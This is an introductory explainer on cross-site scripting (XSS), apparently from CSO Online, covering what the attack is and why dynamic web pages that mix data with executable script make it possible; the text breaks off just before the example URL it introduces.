What is XSS? Cross-site scripting attacks explained | CSO Online .

Html Coding



Cross-site scripting (XSS) is a cyberattack in which a hacker enters malicious code into a web form or web application url. This malicious code, written in a scripting language like JavaScript or PHP, can do anything from vandalizing the website you're trying to load to stealing your passwords or other login credentials.

XSS takes advantage of an important aspect of the modern web, which is that most websites are built on the fly when pages load, sometimes by executing code in the browser itself. That can make such attacks tricky to prevent

How XSS works

Anyone can set up a website that contains malicious code. In a cross-site scripting attack, an attacker sets things up so their code gets on their victim's computer when the victim accesses someone else's website. That's where the "cross" in the name comes from. XSS attacks manage to pull this off without any need to gain privileged access to the web server to plant code on it surreptitiously. Instead, the attackers take advantage of how modern webpages work.

If someone asked you for a basic, entry-level explanation of the web, you would probably tell them something like this: a person who wants to create a webpage writes an HTML document, which they upload to a web server; when a user wants to access that page, they point their browser to the server's address, and the browser downloads the HTML code and interprets it to build a version of the web page for the user.

That description isn't wrong, exactly, but there are aspects that are outdated (and have been for a decade or more). First of all, many if not all web pages are now dynamic—that is, they don't show the same static HTML code to every visitor, but rather are built on the fly from information contained in the server's database when a browser requests access. What page the browser gets back from the server often depends on information it sends with its request—information that sometimes takes the form of parameters in the URL used to access the site. And websites don't just consist of HTML and cascading style sheets (CSS)  that describe how text and graphics should be rendered; they also include executable code written in scripting languages, usually JavaScript. Intermingling data, presentation, and executable code in this way is a sort of "original sin" of web security.

In an XSS attack, a hacker takes advantage of this interaction between a user and a website to get malicious code to execute on the user's machine. But how? Consider the following URL: 

Copyright © 2022 IDG Communications, Inc.